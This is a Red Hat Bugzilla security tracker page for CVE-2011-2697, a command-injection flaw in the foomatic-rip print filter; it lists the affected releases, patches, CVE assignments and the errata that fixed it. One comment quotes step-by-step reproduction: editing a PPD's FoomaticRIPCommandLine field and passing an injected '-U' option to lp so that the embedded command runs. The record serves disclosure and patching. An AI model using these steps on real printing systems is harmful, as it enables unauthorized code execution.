Bug 721001 (CVE-2011-2697) - CVE-2011-2697 foomatic: Improper sanitization of command line option in foomatic-rip
Summary: CVE-2011-2697 foomatic: Improper sanitization of command line option in fooma...
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2011-2697
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 725631 725632 725633 833897
Blocks: 721067
TreeView+ depends on / blocked
 
Reported: 2011-07-13 14:18 UTC by Jan Lieskovsky
Modified: 2019-09-29 12:45 UTC (History)
3 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-08-01 16:00:55 UTC
Embargoed:


Attachments (Terms of Use)
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch (8.53 KB, patch)
2011-07-13 14:24 UTC, Jan Lieskovsky
no flags Details | Diff
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch (14.05 KB, patch)
2011-07-13 14:25 UTC, Jan Lieskovsky
no flags Details | Diff
ppd containing cupsFilter (3.35 KB, application/x-gzip)
2011-07-26 06:47 UTC, Huzaifa S. Sidhpurwala
no flags Details


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2011:1109 0 normal SHIPPED_LIVE Moderate: foomatic security update 2011-08-01 15:56:19 UTC

Description Jan Lieskovsky 2011-07-13 14:18:58 UTC
It was found that foomatic-rip universal print filter did not properly sanitize content of "files to be printed" command line argument, prior performing of the print job. A remote attacker could provide a specially-crafted PostScript Printer Description (PPD) file and trick the local user into printing it, which once performed could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool.

References:
[1] https://bugzilla.novell.com/show_bug.cgi?id=698451
[2] http://www.openwall.com/lists/oss-security/2011/07/13/3
    (CVE Request)

Proposed patch against the foomatic-rip C-source code:
[3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24

Proposed patch against the foomatic-rip Perl script:
[4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25

Comment 1 Jan Lieskovsky 2011-07-13 14:24:15 UTC
Created attachment 512673 [details]
Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch

Comment 2 Jan Lieskovsky 2011-07-13 14:25:09 UTC
Created attachment 512674 [details]
Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch

Comment 3 Jan Lieskovsky 2011-07-13 14:26:29 UTC
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update.

Comment 4 Jan Lieskovsky 2011-07-13 14:28:14 UTC
Created foomatic tracking bugs for this issue

Affects: fedora-all [bug 721008]

Comment 5 Jan Lieskovsky 2011-07-13 14:37:46 UTC
Further detail from Novell bugzilla [1] how to reproduce the issue
(scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products):
==============================================================================

How to reproduce with foomatic-rip:

1.
Set up a queue which uses foomatic-rip
i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry:

# lpadmin -p testy2 -v file:/dev/null \
 -P
/usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz
\
 -E

If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz
is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz

2.
Get the PPD as normal user:

$ wget http://localhost:631/printers/testy2.ppd
...
2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829]

3.
Modify the PPD as normal user:

Change the *FoomaticRIPCommandLine: entry (up to the *End line)
as one likes, e.g. to this single line (without *End line:
*FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out"

4.
Print a dummy job to find out the current job id as normal user:

$ echo Hello | lp -d testy2
request id is testy2-111

5.
Print the malicious job as normal user:

$ lp -d testy -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy-112

6:
Verify that the FoomaticRIPCommandLine was actually executed:

# ls -l /tmp/testy2.out
-rw------- 1 lp lp 57 Jun  7 12:40 /tmp/testy2.out

# cat /tmp/testy2.out
openSUSE 11.4 (x86_64)
VERSION = 11.4
CODENAME = Celadon

==============================================================================

And one correction regarding point 5. yet:

How to reproduce with foomatic-rip:
...
5.
Print the malicious job as normal user:

$ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \
 -o document-format=text/plain testy2.ppd
request id is testy2-112

Comment 10 Jan Lieskovsky 2011-07-18 12:38:40 UTC
The CVE identifier of CVE-2011-2697 has been assigned to this issue:
http://www.openwall.com/lists/oss-security/2011/07/18/3

Comment 12 Huzaifa S. Sidhpurwala 2011-07-26 06:47:58 UTC
Created attachment 515184 [details]
ppd containing cupsFilter

Comment 15 Vincent Danen 2011-07-29 21:51:36 UTC
MITRE has assigned two CVE names here:


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to
the following vulnerability:

Name: CVE-2011-2697
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697
Assigned: 20110711
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file.


Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to
the following vulnerability:

Name: CVE-2011-2964
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964
Assigned: 20110729
Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3
Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1
Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001

foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6
allows remote attackers to execute arbitrary code via a crafted
*FoomaticRIPCommandLine field in a .ppd file, a different
vulnerability than CVE-2011-2697.

Comment 16 Huzaifa S. Sidhpurwala 2011-08-01 02:55:24 UTC
Looking at the description of the CVEs from above:

CVE-2011-2697 is for the perl version in foomatic 3.x:
Affects: rhel-4 , rhel-5

CVE-2011-2964 is for the C version in foomatic 4.x:
Affects: rhel-6, Fedora

Comment 17 Huzaifa S. Sidhpurwala 2011-08-01 03:25:16 UTC
Keeping this bug for the perl issue.

Comment 18 errata-xmlrpc 2011-08-01 15:56:24 UTC
This issue has been addressed in following products:

  Red Hat Enterprise Linux 4
  Red Hat Enterprise Linux 5

Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html


Note You need to log in before you can comment on or make changes to this bug.